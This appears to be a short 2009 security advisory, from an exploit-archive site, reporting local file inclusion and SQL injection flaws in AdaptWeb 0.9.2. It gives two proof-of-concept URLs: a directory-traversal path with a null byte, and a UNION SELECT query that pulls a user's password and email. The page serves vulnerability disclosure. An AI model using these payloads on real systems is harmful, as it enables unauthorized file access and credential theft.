AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities

2009.06.24
Credit: SirGod
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22

[+] AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities [+] Script : http://adaptweb.sourceforge.net/ [+] Discovered By SirGod [+] www.mortal-team.org [+] Script homepage : http://adaptweb.sourceforge.net/ [+] Local File Inclusion - PoC http://127.0.0.1/[path]/index.php?newlang=../../../../../../BOOTSECT.BAK%00 [+] SQL Injection - PoC http://127.0.0.1/[path]/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top